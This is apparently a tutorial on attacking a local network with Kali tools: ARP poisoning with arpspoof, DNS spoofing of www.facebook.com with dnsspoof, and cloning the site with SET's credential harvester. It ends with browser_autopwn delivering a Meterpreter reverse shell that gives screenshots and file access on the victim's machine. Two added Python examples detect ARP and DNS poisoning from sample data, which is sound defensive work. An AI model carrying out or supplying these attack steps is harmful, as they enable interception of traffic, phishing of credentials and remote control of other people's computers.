ARP poisoning with Kali to reverse shell
An ARP man-in-the-middle (MITM) attack first requires telling the gateway (192.168.111.222) that the victim's IP address (192.168.2.4) belongs to the attacker's MAC address, and telling the victim that the gateway's IP address belongs to the attacker's MAC address. Use the following commands in two separate terminals in Kali (eth6 is the attacker's network interface):
arpspoof -i eth6 -t 192.168.111.222 192.168.2.4
arpspoof -i eth6 -t 192.168.2.4 192.168.111.222
Note that ARP spoofing on its own only redirects the victim's traffic to the attacker's machine; unless IP forwarding is enabled there, the intercepted packets are dropped instead of being relayed, and the victim loses connectivity (which makes the attack obvious). Check the current status of IP forwarding with the following command:
cat /proc/sys/net/ipv4/ip_forward
If the output is "0", IP forwarding is currently disabled. To enable it (as root), use the following command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Once the man-in-the-middle position is established, a tool called Driftnet (driftnet -i <interface>) can display images from the victim's unencrypted (HTTP) web browsing as they pass through the attacker's machine.
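The attack described above leaves a characteristic trace on the network, and the following added example (written for this page, not code from the original tutorial or from the dsniff/arpspoof project) shows how a defender detects it from observed ARP replies. The two forged streams bind both the gateway's IP and the victim's IP to the attacker's MAC, so a monitor sees an IP address whose MAC suddenly changes and a single MAC answering for more than one address; this is the same logic behind arpwatch's "changed ethernet address" alerts. The MAC addresses and the capture itself are constructed sample data; the IP addresses are the ones used on this page.

```python
"""Detecting a two-sided ARP poisoning from observed ARP replies.

Added example for this page, not code from the original tutorial or from the
dsniff/arpspoof project. MAC addresses and the sample capture are constructed;
the IP addresses are the ones used on the page.
"""
from collections import defaultdict
from dataclasses import dataclass

GATEWAY_IP = "192.168.111.222"
VICTIM_IP = "192.168.2.4"


@dataclass(frozen=True)
class ArpReply:
    ts: float         # seconds since start of capture
    sender_ip: str    # ARP "sender protocol address"
    sender_mac: str   # ARP "sender hardware address"


# Constructed sample capture: legitimate traffic first, then the forged stream.
# arpspoof re-sends its forged replies roughly every two seconds.
SAMPLE_REPLIES = [
    ArpReply(0.0, GATEWAY_IP, "aa:bb:cc:00:00:01"),      # genuine gateway (constructed MAC)
    ArpReply(0.5, VICTIM_IP, "aa:bb:cc:00:00:02"),       # genuine victim (constructed MAC)
    ArpReply(1.0, "192.168.2.9", "aa:bb:cc:00:00:03"),   # unrelated host, never contested
    ArpReply(2.0, GATEWAY_IP, "de:ad:be:ef:00:99"),      # forged: attacker claims gateway IP
    ArpReply(2.0, VICTIM_IP, "de:ad:be:ef:00:99"),       # forged: attacker claims victim IP
    ArpReply(4.0, GATEWAY_IP, "de:ad:be:ef:00:99"),      # repeat of the forged binding
    ArpReply(4.0, VICTIM_IP, "de:ad:be:ef:00:99"),       # repeat of the forged binding
]


def mac_changes(replies):
    """arpwatch-style 'changed ethernet address' events.

    The first MAC seen for an IP is the baseline; every later reply that binds
    the IP to a different MAC is reported as (ts, ip, old_mac, new_mac).
    Repeats of a binding that is already current are not reported again.
    """
    current = {}
    events = []
    for r in replies:
        mac = r.sender_mac.lower()
        old = current.get(r.sender_ip)
        if old is not None and old != mac:
            events.append((r.ts, r.sender_ip, old, mac))
        current[r.sender_ip] = mac
    return events


def contested_ips(replies):
    """IPs claimed by more than one MAC -> sorted list of the MACs claiming them."""
    macs_by_ip = defaultdict(set)
    for r in replies:
        macs_by_ip[r.sender_ip].add(r.sender_mac.lower())
    return {ip: sorted(macs) for ip, macs in macs_by_ip.items() if len(macs) > 1}


def likely_mitm_macs(replies):
    """MACs that claim two or more IPs, every one of which is also claimed by
    some other MAC. A genuine multi-homed host owns its addresses uncontested;
    a MAC that only appears as the second claimant for both the gateway and a
    host is the two-sided arpspoof pattern described on this page."""
    contested = contested_ips(replies)
    ips_by_mac = defaultdict(set)
    for r in replies:
        ips_by_mac[r.sender_mac.lower()].add(r.sender_ip)
    return sorted(
        mac for mac, ips in ips_by_mac.items()
        if len(ips) >= 2 and all(ip in contested for ip in ips)
    )


if __name__ == "__main__":
    for ts, ip, old, new in mac_changes(SAMPLE_REPLIES):
        print(f"t={ts:4.1f}s  {ip:16} changed {old} -> {new}")
    print("contested IPs:", contested_ips(SAMPLE_REPLIES))
    print("likely MITM MAC(s):", likely_mitm_macs(SAMPLE_REPLIES))
```

In a real deployment the ArpReply records would be fed from a packet capture on a mirror port or on the hosts themselves. Detection is the fallback; a static ARP entry for the gateway on sensitive hosts, or dynamic ARP inspection on a managed switch, stops the poisoning rather than merely reporting it.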
DNS cache poisoning
Here DNS spoofing is used to impersonate a website like Facebook: the victim's DNS query is answered with the attacker's address, so the victim lands on the attacker's copy of the page, which can then deliver a client-side exploit and obtain a reverse shell. To begin, create a text file in hosts-file format (the IP address to answer with, followed by the hostname to match) and name it something like facebook:
192.168.248.204 www.facebook.com
Save this text file and then run the following command:
dnsspoof -i eth6 -f facebook
This command watches eth6 for DNS queries for www.facebook.com and answers them with the attacker's address before the real resolver does. The attacker then clones the Facebook page and makes it appear as realistic as possible.
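Because dnsspoof races the genuine resolver rather than silencing it, and because the answer it sends is a private address for a public name, the forgery is detectable on the victim's side. The following added example (written for this page, not code from the original tutorial or from the dsniff project) checks a batch of observed DNS answers for both indicators. The records are constructed: the hostname and 192.168.248.204 come from the dnsspoof mapping above, 203.0.113.10 is a documentation-range stand-in for the site's real address, and the list of internal name suffixes is an assumption about this LAN's naming.

```python
"""Flagging forged DNS answers of the kind dnsspoof produces.

Added example for this page, not code from the original tutorial or from the
dsniff project. Sample records are constructed; see the comments for which
values come from the page and which are assumptions.
"""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass

# Address ranges that should never be the answer for a public hostname.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8",                                     # loopback
    "169.254.0.0/16",                                  # link-local
)]

# Names that legitimately resolve to internal addresses (assumed for this LAN).
INTERNAL_SUFFIXES = (".lan", ".local", ".internal", ".home.arpa")


@dataclass(frozen=True)
class DnsAnswer:
    qname: str   # queried name
    txid: int    # DNS transaction id, copied from the query into the answer
    rdata: str   # A record carried in the answer


SAMPLE_ANSWERS = [
    # genuine answer (documentation-range stand-in address) for query id 0x1a2b
    DnsAnswer("www.facebook.com", 0x1A2B, "203.0.113.10"),
    # forged answer to the same query, as the page's dnsspoof mapping would send it
    DnsAnswer("www.facebook.com.", 0x1A2B, "192.168.248.204"),
    # internal name resolving to an internal address: expected, not suspicious
    DnsAnswer("printer.lan", 0x3C4D, "192.168.248.50"),
]


def normalize(qname):
    """Lower-case and drop the trailing dot so 'Foo.com.' and 'foo.com' compare equal."""
    return qname.lower().rstrip(".")


def is_internal_address(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def is_internal_name(qname):
    return normalize(qname).endswith(INTERNAL_SUFFIXES)


def check_answer(ans):
    """Reasons this single answer looks forged; empty list when it looks fine."""
    reasons = []
    if is_internal_address(ans.rdata) and not is_internal_name(ans.qname):
        reasons.append(f"public name resolves to internal address {ans.rdata}")
    return reasons


def conflicting_answers(answers):
    """(name, txid) pairs that received more than one distinct A record.

    Two different answers to one transaction mean two responders: the genuine
    resolver and something racing it. Returns the distinct rdata, sorted.
    """
    seen = defaultdict(set)
    for a in answers:
        seen[(normalize(a.qname), a.txid)].add(a.rdata)
    return {key: sorted(v) for key, v in seen.items() if len(v) > 1}


def triage(answers):
    """All (name, reason) alerts: per-answer checks first, then transaction conflicts."""
    alerts = [(normalize(a.qname), r) for a in answers for r in check_answer(a)]
    for (name, txid), data in conflicting_answers(answers).items():
        alerts.append((name, f"txid {txid:#06x} answered with both {' and '.join(data)}"))
    return alerts


if __name__ == "__main__":
    for name, reason in triage(SAMPLE_ANSWERS):
        print(f"{name}: {reason}")
```

The per-answer check fires on the victim host even when the sensor misses the genuine response; the conflict check needs a passive capture that sees both answers. Neither check is a substitute for DNSSEC validation or for the TLS certificate mismatch the victim's browser would show when the cloned site is served without a valid certificate for the real name.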
Next, launch a client-side attack against the victim's browser with the Social-Engineer Toolkit (SET) by Dave Kennedy. If SET is not already installed, install it with the following commands:
git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
cd setoolkit
pip3 install -r requirements.txt
python setup.py
SET comes pre-installed in Kali Linux, so there you can skip the installation and simply run setoolkit in a terminal to launch the tool. From the menus, select the following options in order:
Social Engineering Attacks
Website Attack Vectors
Credential Harvester Attack Method
Web Templates
Site Cloner
Answer "no" to the NAT/port-forwarding question, and enter the IP address of the attacker's machine when prompted. When asked which website to clone, enter http://www.facebook.com. Then select "browser_autopwn" and set the payload to Meterpreter (4), listening on port 443.
If everything goes well, a Meterpreter session is established with the victim's machine. To interact with it, use the following command:
sessions -i 1
Then type screenshot to capture the victim's desktop, and shell to open a command shell on the victim's machine. At that point you have access to the victim's file system.